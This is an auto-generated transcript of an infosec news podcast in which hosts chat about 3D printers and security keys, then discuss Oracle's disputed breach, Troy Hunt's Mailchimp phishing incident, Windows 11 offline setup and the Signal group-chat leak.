![The Oracle of Lies! – 2025-03-31 — Talkin' Bout [Infosec] News cover](https://assets.blubrry.com/coverart/orig/577207-646458.jpg)
Loading summary
Transcript476 lines
- [00:01]
Ryan
Ryan, I think your audio is coming in from a different source.
- [00:04]
Test Speaker
Test, test, test, test.
- [00:06]
Ryan
Yours is fine.
- [00:07]
Scroll Speaker
Scroll down.
- [00:08]
Ryan
You don't. You don't sound as beautiful.
- [00:10]
Scroll Speaker
You changed my setting on me.
- [00:12]
Ralph May
Hold on.
- [00:14]
Ryan
I knew it.
- [00:15]
Unknown Speaker E
I kid you not. I already posted it to LinkedIn and I've had some wonderful replies. I have never gotten a coin before and I kid you not. This is awesome.
- [00:25]
Ralph May
Look at that.
- [00:26]
Unknown Speaker E
So amazingly awesome.
- [00:29]
Ryan
That is awesome. Those coins came in midday the day before the conference. They almost didn't make it. Yeah, we thought we were gonna have to just hold on down for next year. To tell you the truth, I wasn't gonna ship them to you. That's too much work.
- [00:44]
Unknown Speaker E
Yeah, but they say 2025.
- [00:47]
Ralph May
Do they?
- [00:48]
Ryan
Oh, then we would have been screwed. I didn't design the coins.
- [00:51]
Unknown Speaker E
No, they say 2025. I've been the. The hardest part about deciphering the binary is typing all the ones and zeros accurately.
- [01:06]
Ryan
You don't know what it says, so.
- [01:08]
Unknown Speaker E
I do.
- [01:09]
Ryan
Okay.
- [01:10]
Unknown Speaker E
And no, I'm not going to tell you. Well, that would spoil it. Come on.
- [01:17]
Scroll Speaker
Yeah, no spoilers.
- [01:19]
Ryan
No spoilers, no spoilers.
- [01:22]
Unknown Speaker F
Can you at least show us the other side of the coin so we can all try it at home and play along?
- [01:27]
Unknown Speaker E
Well, one disadvantage is it is very, very shiny, so it doesn't show.
- [01:36]
Unknown Speaker F
Okay. Oh, wow.
- [01:40]
Scroll Speaker
I can tell what it says right now. It says, remember to drink your Ovaltine.
- [01:49]
Unknown Speaker E
It's hexadecimal on the outside and it's binary on the inside. And it's all the. The yummy things.
- [01:58]
Ryan
I will admit, Secure ideas was there and they were giving away a Bamboo Labs printer. If I don't win that printer, it's going to be.
- [02:06]
Ralph May
Was it the new one they just dropped?
- [02:09]
Ryan
No, no, it was the old. It was like the smallest one they had. But I'm like, yeah, okay, yeah, the $2,000 printer. Or then plus like the extra box that goes on top, which is like another 500 bucks.
- [02:21]
Ralph May
The whole EMS.
- [02:22]
Ryan
Yeah, dude, I want it.
- [02:23]
Ralph May
Well, I have. The one behind me is the X one, right?
- [02:26]
Ryan
Yeah.
- [02:27]
Ralph May
You can't see them, but there's double amss. I got two amss on top right there. Yeah. But the new one is even bigger print volume. But the thing that makes it awesome is it has two print heads. So it's really awesome for multi material printing and other kinds of, like, complex printing. Like, you can print stuff twice as fast and you can also do especially. It's really, really useful if you want to do removable. What do you call it supports. So what it'll do is one nozzle will print out the supports while the other one's printing the actual thing. It just. It makes it. That's why.
- [03:02]
Ryan
Yeah, they were. They were printing up stuff at their booth and I couldn't believe how fast it was as compared to my. My Honda Civic of a Frankenstein 3D printer.
- [03:12]
Ralph May
Yeah, I mean.
- [03:15]
Unknown Speaker G
You.
- [03:15]
Ralph May
You.
- [03:16]
Ryan
Dude, that thing is put together with gum and a couple bolts. Like, I. There's a reason you guys don't see me printing anymore.
- [03:24]
Ralph May
So that. That's a bed. The. The. The Bambu Labs and some of the other newer ones are core. Are Core XY or Core xyz. Which. What happens is, is that with your bed slinger, they literally call it that because it slides back and forth to move. Well, the bed doesn't actually move in that direction. What happens is, is that the bed just raises up and then you have the core. Core xyz. So it. It does a lot. It prints a lot faster. Right. So.
- [03:49]
Test Speaker
Ah, okay.
- [03:50]
Ralph May
Yeah, it's a different way of printing. Not just that it moves faster. Um, so anywho, that.
- [03:56]
Ryan
That one was still a bed slinger. It was whatever their smallest one is.
- [04:00]
Ralph May
Yeah.
- [04:00]
Ryan
And I do.
- [04:01]
Ralph May
They do have one. Yeah, exactly.
- [04:03]
Ryan
It was still lightning fast, like, and it was printing out some cool stuff, and I was like, this is stupid. Like, I hate myself. Why did I buy.
- [04:10]
Ralph May
Yeah, I know. Oh, looks like we have a chicken story today.
- [04:14]
Ryan
Oh, I really like Honda Civics too. All right. Honda Civics have their place. Especially if you're into JDM and you like fixing your own stuff. Okay, I. I had a Subaru. I know how blown up headed heads work, all right? I've trained transmissions. Why do you think I bought the Honda Civic 3D printer? I knew what I was getting into somewhat. And now I want the BMW where I don't have to do anything anymore and it just levels itself.
- [04:40]
Scroll Speaker
That's not how BMWs work.
- [04:42]
Ryan
Yeah, all right, that's a good point. That's a good point. I don't. I don't even know what kind of car works anymore.
- [04:48]
Ralph May
Right?
- [04:48]
Ryan
Like, and give me an.
- [04:50]
Scroll Speaker
Edit the analogy backwards.
- [04:52]
Test Speaker
Do any of us really. No.
- [04:54]
Ralph May
You want the Apple. You want the Apple version, right?
- [04:57]
Ryan
I'm not gonna say that. How dare you.
- [05:02]
Ralph May
The one that kind of like, you know, just works, right?
- [05:05]
Ryan
It just works. If you don't want to play video games is what it does. Right? What doesn't play?
- [05:10]
Ralph May
Wow.
- [05:11]
Ryan
I don't know. I haven't. I haven't Used my work, sent me an Apple and a Windows box.
- [05:15]
Ralph May
You can be playing all these beautiful video games. I'm just kidding. It's not really great.
- [05:18]
Ryan
They said they sent me both. And I'm not gonna lie to you. Like, I logged into both, got them both working, and then I just stayed on the Windows box. I still have the Apple box. I tried to log into today, and I've realized I forgot the password. I'm too scared to tell anybody now I'm telling all you guys.
- [05:35]
Ralph May
Have you not just told everybody that you.
- [05:40]
Ryan
It's okay.
- [05:40]
Ralph May
You can hack your way in?
- [05:41]
Ryan
I. I remember because I have, like, my. My passwords are pretty complex, but I have, like, some matching characters, like, where they go to. And I remember Apple, like, saying that I couldn't do that. And so I, like, switched up the password, and I don't remember which one I switched it to.
- [05:56]
Unknown Speaker G
I did that recently, too, where I'm like, what was in the password manager was not the right password? And I'm like, oh, crud. I just set this recently. I'm like, wait, I think I remember the password. And I tried it for memory. And I'm like, yep, memory password, let me back in. I am going to update that in the password manager because I cannot be using a password that I can just like it guess in two tries.
- [06:19]
Ralph May
So here's what I do so I don't ever have to do that anymore. I just use the new key, right? And there's two. Two reasons why you should consider this. Okay. Number one is that if you do a long press, it will just print out a password, right? Or just a long text, right? So if you have any device that you want to log into, you can just set it all to the same password. It's like 35 characters. You'll never be able to, you know, guess it or whatever, right? The second thing is that it. So it supports speed base, so pki.
- [06:52]
Ryan
Right?
- [06:53]
Ralph May
And so what happens is, is when I plug this into a Mac, and also it works with Windows, it'll just ask for a pin and then I unlock it. So I never actually have to use that. So then I always have my original password. The only thing I will say before you go all out there and get one, get two, because if this thing breaks, you heard like a real hurt locker for, like, how to get back in. So how about.
- [07:14]
Ryan
I'm gonna go. I'm gonna go two ways with this. First, I set up biometrics, and for some reason, not letting me log in with a fingerprint. I Don't know why I haven't opened a ticket or anything. So we'll figure that out later. The other thing is I have three of those and I have just haven't set anything up yet.
- [07:30]
Ralph May
Nothing. Oh my God.
- [07:32]
Ryan
I actually have.
- [07:33]
Test Speaker
I'm not gonna lie, I have my second one on the way because I found out that popsicle juice from my daughter doesn't work with. So I got the definition of a sticky key.
- [07:50]
Ralph May
Yeah, having a three Yuga keys and not using them is like having three cars and walking to work pretty much.
- [07:55]
Ryan
You know, I'm just like so tired of all this stuff. Like, I'm just like, I got just another thing I have to carry. I'm already doing all these things.
- [08:03]
Ralph May
Yes.
- [08:03]
Ryan
And then I have my home lab. I had a, had a RAM stick go bad in my home lab. That took me forever to figure out.
- [08:09]
Ralph May
Ouch.
- [08:10]
Ryan
Then I had to wait for Taiwan and like they shipped the new RAM from Taiwan. And then I was like, we just need to roll the finger. I need to get, to get out of this. I'm just going to dig myself into a deeper hole.
- [08:20]
Ralph May
Oh, so somebody just brought this up before we jump into it. There's also the only key, which is another one of these key devices. This one just has a KEN to enter on it. It's kind of cool. So anyways, yeah, anyhow, let's roll that beautiful finger footage. Welcome to Black Hills Information Security. Talking about the news. I am your host today, Ralph May. And I have not read one single bit of these articles.
- [08:58]
Ryan
As it should be. As it should be.
- [09:01]
Ralph May
But I will say we do have a chicken article.
- [09:04]
Ryan
Ah, that was the only one I read. That was the only article I read.
- [09:07]
Unknown Speaker G
The one chicken article.
- [09:09]
Test Speaker
Saved by the chicken.
- [09:10]
Ralph May
Saved by the chicken. We also have some more ransomware. You know, the usual stuff. Breach the denial of the denial. We talked about it. We talked about it. We said these guys have been breached. They don't want to admit it. And guess what? Now they're going to have to admit it. So anyways, I am joined by an illustrious cast of many characters, including BSD Bandit who never shows up to the show. So welcome as well as our usual contestants here. So thank you all for joining us and thank you viewers for listening to me talk. I don't know, this is weird every time I think about it.
- [09:51]
Ryan
So at the, at the conference this weekend, San Diego Bsides, I was approached by several people asking for more chicken articles or claiming there needs to be more chicken articles. So here you go.
- [10:02]
Scroll Speaker
Is that what we're starting with.
- [10:03]
Ryan
Yeah, no, I wanna. Do you wanna start with it or end with it?
- [10:06]
Ralph May
Starter. End with it. I don't know.
- [10:08]
Ryan
Yeah, I feel like it's not a lot. It's not a lot, but it's.
- [10:12]
Ralph May
There's.
- [10:12]
Unknown Speaker G
Yeah, there's not gonna be.
- [10:13]
Ralph May
Not much for a chicken article, right? Like, chicken and cyber security, like, going together. Unless they have, like, chicken AI or something. That sounds like something we should get on.
- [10:23]
Unknown Speaker E
I could probably train an LLM to talk like Thaghorn Longhorn.
- [10:28]
Ralph May
Yeah.
- [10:28]
Ryan
Well, I say. Well, I say.
- [10:30]
Test Speaker
Interesting.
- [10:31]
Ralph May
I say.
- [10:31]
Test Speaker
I say. I say this is not AI, you know, nice program, but it has a mind like a steel trap. Like, these are things that you can literally, like, put out there. That would be interesting.
- [10:43]
Ralph May
All right, so we'll come back to the chicken article. Do you guys want to start with this Oracle one? I felt like that one was kind of hot. And it's obviously the only one that actually had some backstory, too, so somebody else can lead. Last. I think it was last week, right, we talked about the Oracle security data breach, right? So what had happened happened was. If you hadn't listened to last week on one of the breach forms or whatever they're calling it, this week, there was a post about a data leak for Oracle, and they provided a bunch of credentials from their sso. And Oracle was like, nah, man, that's not us. You know, they pretty much pulled the shaggy defense and we kind of called it out. We were like, this will probably be real. And it does indeed look like it was real. Even though I think still to this day, Oracle's, like, kind of not acknowledging it. Right. What do you guys think here?
- [11:34]
Ryan
They didn't acknowledge it. I thought they did. Did they or did they not? There's too many articles about this now.
- [11:41]
Unknown Speaker G
I do like the one and I shared this one from. Yeah, I confused his name, but it's Kevin Beaumont Gossie the dog. I always try to call him, like, Kevin Gossie, but.
- [11:50]
Ralph May
Okay, okay, got it.
- [11:53]
Unknown Speaker G
Yeah. And this was updated. And then they go, yeah, there's like, the archive.org exclusion process to remove evidence. They forgot to remove, like, the.
- [12:03]
Ryan
Yeah, yeah, they go.
- [12:05]
Unknown Speaker G
It's like, okay, so all these. All these threat actors, like, claims that they got access, they're trying to refute them, but then it's like, well, they're also trying to clean up the evidence. Then I saw from the. I think from when I dug into, like, the Finastron data breach in November, like, I noticed a thing on Breach forums where prior basically, like right before and right after a threat actor will post their stuff, they will kind of delete and recreate their account so that it effectively on the forums, like purges all their history. So they'll go, oh, hey, here's me posting this with like one post. Is the, hey, I have all this information and there's been a history that like, well, a month ago you had 34 posts and 13 threads. And now that you post this, you have just this one post and then you go back in a week and that same user has no posts whatsoever. But they've rejoined just yesterday and they invited two other new users that join within a minute of the invite being sent out and both within a minute of each other. So you go, okay, so they're just really just rinsing and re. Repeating. They're rinsing their, their profile. So when. That's a long way to say when you're getting to that evidence of like, oh, we can't trust this because they only have like one post and they just. How do we know this is legit? It's like, yeah, a lot of like, you know, they burned down their account and then more than likely, if you dig into that user on breach forums and look at their invites, they more than likely just invited a new user that immediately joined and that's basically just them moving to a new account.
- [13:56]
Ryan
Yeah.
- [13:57]
Ralph May
So the other thing too is that there is definitely some more like facts coming out. And also Oracle is saying, all right, check this out, this one I loved. Oracle is saying that it wasn't compromised because Oracle rebranded Oracle Cloud to Oracle Classic now. And they're saying Oracle Cloud did not have an incident, but Oracle Classic did.
- [14:20]
Ryan
So we can do that.
- [14:22]
Ralph May
Making this up. Yes.
- [14:23]
Unknown Speaker G
Wordsmithing. Wordsmithing is the theme of the week here, so we might get to that story. But wordsmithing things.
- [14:30]
Ralph May
Yeah.
- [14:31]
Unknown Speaker E
All right, well, word smithing or spin.
- [14:35]
Unknown Speaker G
See, there you go. You're spinning the word smithing.
- [14:39]
Test Speaker
It's like saying decaf and caffeinated. The decaf was compromised, but the caffeinated is still good.
- [14:45]
Ryan
So I think I know the answer to this, but I want someone else to clarify if, if your company showed up in the breach and the data in this, what are some of the defensive or reactive controls that you should immediately to take if, if your name were to pop up in that. Because I know there's a tool you can go and check to see if you're, if you're listed anywhere in this breach. Does anybody want to Pipe up about that so I don't have to say it.
- [15:09]
Ralph May
What, what, what should you do?
- [15:11]
Ryan
Like, what, what should you do? What should you do if your name did get listed in the data that was in the breach?
- [15:15]
Ralph May
Oh, I mean, panic run.
- [15:17]
Ryan
No.
- [15:17]
Ralph May
I mean, no. So, I mean, yeah, I'll take my stat, right? So look at resetting those accounts, right? Like, I mean, all of them, everything, right. And however those are being authenticated, I mean, let's just assume that they're all, all compromised and you should go through like an account reset for all of them.
- [15:37]
Ryan
So that's all I wanted. That's exactly. I was going to say, just reset anything, any connections you ever have with NetSuite or Oracle or anything. Just, just hopefully you didn't do it on a Friday when payroll was ready to go, right?
- [15:50]
Ralph May
That makes it worse.
- [15:51]
Ryan
Maybe not.
- [15:52]
Ralph May
Oh, yeah, that's. That's actually one of my sites is actually see, if you've been breached. You just have to enter your social mother's maiden name.
- [15:59]
Unknown Speaker G
Like, you know, just a couple bits.
- [16:00]
Test Speaker
Of information guaranteed you I will be.
- [16:03]
Ralph May
Able to tell if you've been breached or not.
- [16:05]
Ryan
Your first dog, the street you lived on.
- [16:09]
Test Speaker
Send us all the information.
- [16:11]
Ralph May
So what have we learned here? That Oracle is just as bad with security as they were 20 years. It's like they. Even worse now. They're like, just digging a hole. And they're like, no, I swear we're not digging a hole. And everyone's like, look, I see the hole. You're like, no, man, that's someone else's hole.
- [16:29]
Unknown Speaker E
Are they actually worse or do we just have better visibility into when stuff happens with their stuff?
- [16:36]
Ralph May
Is there a better marketplace for threat actors? Is that what you're trying to say?
- [16:40]
Unknown Speaker E
No, I'm saying, I mean, it's like, okay, did. Did more of XYZ happen in the past or. Or in the present? Or is it just that now we hear about.
- [16:51]
Test Speaker
Well, hold on, hold on.
- [16:53]
Ralph May
So I think two things, right? So we're talking about, like, whether they have better or. Or worse security. And I'm actually not even saying they do or don't. I guess it's more of how they handle it. Like, usually they attack people that, you know, talk about some security thing or threaten to sue them or do whatever. And at this point they're like, well, we can't sue this person, so let's deny it. I mean, they literally went shaggy defense, like all the way down the line.
- [17:15]
Test Speaker
I do think, I do think they, they tend to hide it. They try to hide it more. I think the security.
- [17:21]
Ralph May
Yeah, the.
- [17:21]
Test Speaker
The lack of security is still the same. It's just that it's the. Like, the bar has. They're. They're more concerned about the image more so than just actually fixing things. I think it's just more so. And I think they went into panic mode when they actually did get breached. But, like, okay, we got it. We got to do damage control, like, right away. Because this is the era of cancel culture, as you know. And, you know, it's one bad thing gets out there about you. It kind of like runs its own narrative for, like, ever now. Now more than ever, no pun intended.
- [17:52]
Unknown Speaker G
The initial narrative. That works because we've seen this. Like, we. I can. I'll name names. Like, yeah, when, like, Octa had the data breach and they're like, yeah, yeah, there's only like, 1% of customers were impacted. And they come back and they're like, wait, did we mean. Did we say 1%? We meant like 100%. So we actually. And it was like, they just didn't have. Yeah, they had, like, the selection, like, filters wrong. But there's been numerous companies that have done that to where they go, you know, it really only affects, like, a small percentage of our companies, of our customers. And then, you know, a week later, a couple of days later, it's like, well, no, it's much more significant that. Well, nobody really notices that secondary follow up of the. Oh, actually it affected, like, more, you know.
- [18:39]
Ryan
Right.
- [18:39]
Unknown Speaker G
A order of magnitude more than they initially said. I think we've also looked at this, like, you know, stock prices, customer confidence doesn't get impacted when they do something like that. Just lie right away or be deceptive right away. Wordsmith it right away and go, it wasn't a breach. Well, we don't know if it's a credible source. We're going to say that this is a highly discredited source. And so there was nothing that happened. And then you follow along with us or other intel feeds and you go, well, actually, it was a breach. Okay. You know, the. The narrative had been for, you know, five, four or five days now that it's like, it wasn't a breach.
- [19:24]
Ryan
I want to. I want to. I want to point out there. Alex just called us an intel feed. We are not an intel feed.
- [19:30]
Test Speaker
Oh, my goodness.
- [19:33]
Unknown Speaker G
Or other Intel.
- [19:35]
Ryan
But that. That makes it assume that we are an intel feed. I would not say we are. We are. To me, satire. We are the onion of cyber intel feeds.
- [19:46]
Unknown Speaker G
For the first us, like, you need to up your, your threatened game.
- [19:51]
Ralph May
Yeah, I, I think it's not if you're finding it out the first time, but if you're relying on us to tell you how to do about it. Yes, please don't, you know.
- [19:58]
Ryan
Yeah, you could send payment to. No.
- [20:02]
Unknown Speaker F
Does it, doesn't it seem though like the polar opposite of the way things were handled as like take Troy Hunt this week, for example. Right. I don't, I, I mean, I don't know if we're going to talk about that article or not, but, you know, you look at the way that was handled and it was handled within seconds, you know, like, like, because, you know, and I think I mentioned this before, but I follow Troy Hunt's, you know, his, his webcast on a really regular basis and I replayed it today and you know, his main concern was, oh my gosh, I want to notify my clientele before they hear it from anybody else. I want to get the real story out there so that they can take whatever precautions they need to do. And you know, it's like the polar opposite of what happened, you know, with the other story.
- [20:46]
Ralph May
Yeah.
- [20:46]
Unknown Speaker G
So what happened with Troy Hutt?
- [20:48]
Ralph May
What's, what's this mailchimp story? I have no idea.
- [20:51]
Unknown Speaker F
Yeah, well, it was, it was just a fish it was in and he was jet lagged and you know, and of course I'm paraphrasing and not, you know, I don't mean to speak for it, but I, I did hear the stream today. So, you know, he, he was fished and he was, he was very lack of sleep. I think he just traveled across the continent and, and he just, it looked like something was a little amiss with his mailchimp account. So he, he clicked on it. And, and I think to his defense too, he was saying that when he travels, you know, he uses the iPad. So the iPad doesn't display the URL like, like it would on the computer. And so, you know, and so yeah.
- [21:26]
Unknown Speaker E
So that's one of the disadvantages to doing anything on mobile devices. I mean, if you're on a desktop, you can hover so you can inspect the URL before you click on it. But with mobile you don't have an equivalent feature or at least not one that I know of. If I'm wrong on that, I would love to know how to do it.
- [21:47]
Ryan
And this is why you use a password.
- [21:50]
Scroll Speaker
You can get that sometimes. It'll give you a preview of at least in emails. If you tap on iOS, if you tap and hold like the sender Person. It should show you what that is. Not tap to click, but just on the name itself.
- [22:06]
Unknown Speaker E
Yeah, see but that's fine motor control issue. And some of us have.
- [22:10]
Scroll Speaker
That's, that's true.
- [22:12]
Unknown Speaker E
Those of us are getting older have more fine motor control issues.
- [22:20]
Ryan
This is the password manager, right? Like when you try to log in and the password manager doesn't recognize it, you're like, oh wait, wait a second. Like, why isn't. I'm not gonna lie, that happens all the time. And I still put the password in, but it definitely makes me look and try to realize it a little more.
- [22:34]
Ralph May
Yeah, he talks about that in the article about how, you know, that should have saved him. But there's lots of sites where it doesn't fill it in so, you know, you just go look it up. And I've actually seen that before. I wish there was. That'd be a great feature for something like 1Password to, to, you know, let.
- [22:50]
Ryan
You know that this not saying anything here doesn't look like legitimate.
- [22:56]
Ralph May
But you know, I mean like, it's just supposed to be like an extra safety check as opposed to like the only way to prevent phishing. It's not, that's not really supposed to be what it's supposed to do, but it should, you know, be able to connect and be like, hey, this is typically where it logs in. You know, this looks, you know, maybe let's update it. This is the actual site. You know, that kind of thing.
- [23:14]
Ryan
But I'm not, I'm pretty sure I.
- [23:16]
Unknown Speaker G
Don'T know one password.
- [23:17]
Ryan
I'm pretty sure does that. It asks you if you want to. Are you sure you want to use this? It doesn't recognize this website.
- [23:22]
Ralph May
Yeah. Okay.
- [23:23]
Unknown Speaker E
It does have things built in.
- [23:24]
Ralph May
Right?
- [23:25]
Ryan
Okay.
- [23:26]
Ralph May
I mean, you know, I use it all the time.
- [23:28]
Test Speaker
What is this protection mania? Password. What? 1 password versus UBI key. Like that's what we're doing. Password.
- [23:41]
Ralph May
So anyways, kind of interesting article. I mean the, the kind of, the TLDR here is that he got fished and the, the real thing lesson is that anyone can get fished, right?
- [23:52]
Test Speaker
Yeah.
- [23:54]
Ralph May
Even the guy looking for people doing phishing stuff. So kind of interesting. Definitely well respected in this kind of data breach and other kinds of things like that. So yeah, kind of interesting.
- [24:07]
Test Speaker
We're all human.
- [24:09]
Unknown Speaker G
Well, yeah, I think there's also like the takeaway that shows that you can't rely solely on user vigilance. Like the end user vigilance being like, okay, nobody's going to have a busy day. Nobody's going to be flying through their emails. Nobody's going to be jet lagged. And there are a lot of companies that their phishing defenses are exactly that with the we're going to do training, we're going to have user visual. It's like you should know better than to all four listen. No, you as security defenders like you need to put in place additional defenses for if your end user slips up. Because if you're strictly relying on user vigilance, you're going to get, you're going to get pwned just like try.
- [24:47]
Test Speaker
Because it's kind of like a mechanism to kind of slow you down a little bit. Just to say as I kind of look at it as it's just kind of like, okay, this doesn't work. Okay, slow down. It's kind of like just telling you okay, slow down and make sure this is what you really want to do.
- [25:01]
Ralph May
Right.
- [25:01]
Test Speaker
It's kind of like when you want to delete something that says are you sure?
- [25:06]
Ralph May
Like a speed bump. This is also. And he brings this up in the article, but this is also another great example where something like a Keepass would have prevented this entirely. And even with a phishing website that is totally legit and you're totally clicking all the links and you're trying to log in. As soon as you get to that part where you have to use your, you know, your Keepass, it's not going to work like and they're not going to be able to capture it no matter how advanced their infrastructure of capturing and man in the middling and all the other things. Right. So that is another great reason to use that on all the sites that do offer it. Right.
- [25:41]
Unknown Speaker E
So ah, and there's the rub. That do offer it.
- [25:46]
Ralph May
Yes, yes.
- [25:47]
Unknown Speaker G
Mailchimp does not offer it.
- [25:48]
Ralph May
Many other sites don't. Many sites have started to implement it though. And not for the security reasons. Some definitely for security reasons. But a lot of starting to implement it for the convenience. Right. Because you don't even need a username or a password. You can just present that key and they know exactly who you are. Yeah, exactly. So it's just faster way to log in actually. So anyhow, interesting. What else do we got?
- [26:19]
Unknown Speaker G
I got one.
- [26:20]
Ralph May
This is a short one. And if anybody else has other ones after this. But has Anyone installed Windows 11 from scratch?
- [26:30]
Ryan
Yes.
- [26:30]
Ralph May
Okay, let me ask you this. Has anyone ever installed the Windows 11 without the Internet?
- [26:37]
Ryan
Dude, I was trying to figure that out and it does not look possible.
- [26:46]
Unknown Speaker F
I bypass that every time. I can't believe I'M not going to have that feature again.
- [26:51]
Ralph May
Yeah, so there is a couple loopholes in how to install Windows 11 without the Internet and Microsoft being so benevolent is removing actually one of those. So now the only way is you have to actually use shift F10 and then you know, jump in the terminal command prompt. Excuse me. And had to add a registry key just to bypass it. So. And who knows how long that will last. But very frustrating if you have done this before, tried to install Windows 11 without the Internet or just to fight around the menu to get Windows 11 on a local account as opposed to adding a Microsoft account.
- [27:32]
Ryan
That's the hard part, having that Microsoft account.
- [27:37]
Test Speaker
I'll tell you one thing that going through that process made me take a nap. I mean. Yeah, it was brutal.
- [27:46]
Unknown Speaker E
Yeah, I always like on my personal system, I always like creating a separate user just for things like games. I don't want my games to interfere with when I'm doing more serious stuff and you know, it keeps it away. I don't want to have to have my user, my main 365 user ID tied to that because it's separate. Otherwise what's the purpose of having it be separate?
- [28:14]
Test Speaker
Yeah, that is true.
- [28:18]
Ralph May
It is super annoying though that it's not like, you know, set up without the Internet. This one button, wouldn't that be easy?
- [28:24]
Unknown Speaker G
Right?
- [28:24]
Ralph May
Like, and now we have to like literally hack our way into installing Windows 11.
- [28:31]
Test Speaker
I never thought I'd see the day.
- [28:36]
Ryan
It's almost like we should all just move the Linux or something, right?
- [28:43]
Unknown Speaker G
Arch Linux is going to become less accurate than the year of the Linux using Windows.
- [28:49]
Test Speaker
Or if you want to be like the 11th person in the world that uses BSD, come on over. We welcome you with open arm.
- [29:03]
Ralph May
I use, I use BSD. Well actually it's Unix. It's Mac. Mac is UNIX based.
- [29:09]
Test Speaker
It is, it is.
- [29:10]
Ralph May
And just if you want to get close to the where you know it all starts.
- [29:13]
Test Speaker
That's always the running joke with FreeBSD. It's only 10 of you guys.
- [29:18]
Unknown Speaker G
I mean it sounds like they just assign role. Like when you, when you use bsd. Like your BSD bandit. Like somebody, they don't need to be the BSD Marshall. Yeah, that's.
- [29:29]
Test Speaker
Yeah, the handles locked me in for life. Yes. So yes, there it is.
- [29:36]
Ralph May
All right. You guys want to cook this chicken?
- [29:38]
Ryan
Are we already at time? You want to. We're still got 30 minutes, right?
- [29:43]
Ralph May
We'll leave it for the last article that's there. Give me something else then.
- [29:48]
Ryan
Okay, let's do how the FBI tracked and froze millions sent to criminals. Is that the one? No. What were you going to say, Bronwyn? Which one do you want?
- [29:56]
Unknown Speaker E
I was going to say, dare we tackle Signal Gate?
- [30:02]
Ryan
This is a. Not political. I don't.
- [30:04]
Ralph May
Yeah, it's super.
- [30:05]
Unknown Speaker G
So just.
- [30:06]
Ralph May
All right, all right. I'm gonna try this and just really high level. Right. So it. Try to keep the political piece as far out as I possibly can. Yeah, Just check it out. So you have Signal. Okay.
- [30:20]
Unknown Speaker G
All right, cool.
- [30:21]
Ralph May
And you start a chat with somebody. Yay. All right. And so that is encrypted.
- [30:26]
Unknown Speaker G
Cool.
- [30:27]
Ralph May
But if you accidentally add the wrong person to the chat, now they're in the chat, Right. So they can see what you see and that is encrypted. And they can only see what. They have perfect forward secrecy. So they can only see once you added them. But eventually. Right. If you don't realize they're in the chat and you say something that they shouldn't hear, then that's. That's how it works. Right. I mean, there's no security was broken here. Now the problem becomes is if you've got some really sensitive things that you should probably be not discussing and you happen to have a journalist. Right?
- [31:14]
Unknown Speaker E
Yeah, the chief editor of.
- [31:16]
Ralph May
Yes. And they may talk about this because they're a journalist. Why would they not? Right. So that's the whole story. Avoiding all political pieces. Right, right. That were in there, but literally that's it. So the moral is Signal cannot help you from making mistakes. User error, adding the wrong people to a chat, it will not prevent that. Right. And while Signal is very secure, it should not be used for really sensitive things because it's easy to add the wrong person. There you go.
- [31:54]
Test Speaker
And to add a little bit. And at the end of the day, there's no patch for people.
- [32:00]
Ralph May
Yeah.
- [32:02]
Unknown Speaker G
Don't use Signal to get around record retention rules either. You have the compliance things that we all know here. If you need to retain emails for seven years, you're not going to put that stuff and say, you know what, that, that's too big of a problem. I'm just going to do all the stuff on Signal and delete it after, you know, four weeks. You know, four weeks or something.
- [32:23]
Test Speaker
And this Signal situation should be a shout out to all messaging platforms.
- [32:28]
Unknown Speaker G
Yep.
- [32:29]
Test Speaker
Be mindful of who's in your chat. Be mindful of what you're saying. I mean, whether it's WhatsApp, Telegram, even iMessager.
- [32:41]
Ralph May
Yeah, like be mindful who you got.
- [32:42]
Test Speaker
Yeah, all of them.
- [32:43]
Unknown Speaker E
It was a pbkc. It was a problem between a keyboard and a chair.
- [32:47]
Ralph May
Yeah, Pretty much a phone.
- [32:51]
Unknown Speaker E
One of the things I did like was how Mellow J did a breakdown. I want to say it was for cnn, but I could be wrong. But I mean, he broke it down from the forensic standpoint. He also broke it down from the fact that in this specific case other more secure options were available. So it was not only a user error in terms of adding a wrong person in, it was also a procedural error in terms of not following an established policy. And that's something that. I know people, we run into it all the time. How many times have we discussed just today in this, this session how inconvenient good security can be? And yeah, it can be insecure, but you know, just because a secure tool doesn't provide the appropriate emojis, that's not an excuse to not use the secure.
- [33:48]
Unknown Speaker F
Tool.
- [33:51]
Unknown Speaker E
When it's appropriate to use that secure tool.
- [33:53]
Test Speaker
So, you know, yeah, we didn't have enough cat emojis, so I just let the cat out the bag. I mean, just, you know, all right, not stickers.
- [34:03]
Ryan
That's not malware, Jake. That's, that's Jacob.
- [34:07]
Ralph May
Yeah.
- [34:11]
Ryan
They called him Jacob. That's why. But nobody knows.
- [34:14]
Unknown Speaker F
And not, not also, I think pseudo veggies put in the chat something to the fact that, you know, the, I mean the apt's in the, you know, in the telecoms. Right. So I know signals encrypted both ends, but you know, I think it was. There was a president, I don't know, I won't name the name. I know who it was, but who basically said, you know, everything I do, I do on my devices, I assume breach. Right, I assume breach. So I mean, we have to consider that as well.
- [34:43]
Ralph May
I mean, yeah, so I mean other security people were also talking about like the device security itself. Right. And you know, these mobile. An iPhone, sure, you know, has a certain level of security, but there is nation state threat actors who definitely can compromise them. So, you know, it's still not really a secure device. Right. So anyhow, that's what happened. Don't be dumb. And you know, it makes it easier and follow the rules. Don't use it to get outside of retention policies. I think that's, you know.
- [35:13]
Scroll Speaker
And wasn't there just like an FBI advisory about not using signal? It came out roughly in the same time frame.
- [35:22]
Ralph May
I think about not.
- [35:25]
Unknown Speaker F
That was signal.
- [35:26]
Ryan
I thought it was sms. Not using sms.
- [35:28]
Scroll Speaker
Not using sms.
- [35:29]
Ralph May
Okay.
- [35:30]
Scroll Speaker
That's what it is.
- [35:30]
Unknown Speaker G
Sorry no, there was something about the insecurities of signal. There was something for signal. You're thinking of the FBI did something for SMS messages. But I believe the Pentagon sent something agency wide about signal. So you're both kind of right. There's a type of things in there with the jokes about, well, they sent him an email and who checks his email? I should have sent that notice about it.
- [35:56]
Ralph May
You should have put that notice on signal.
- [35:58]
Unknown Speaker G
I would have totally on the group chat, you would have seen it.
- [36:01]
Scroll Speaker
Seems like it's awful coincidence that that went out though.
- [36:04]
Unknown Speaker G
Yeah.
- [36:07]
Ryan
Days after signaling the Pentagon warned the app. Yeah.
- [36:10]
Ralph May
All right.
- [36:11]
Ryan
I didn't see that. That more sounds like some people are you. Some like shadow it. They're like, ah, we don't need to use the official Pentagon app. The signal app is so much better.
- [36:21]
Unknown Speaker G
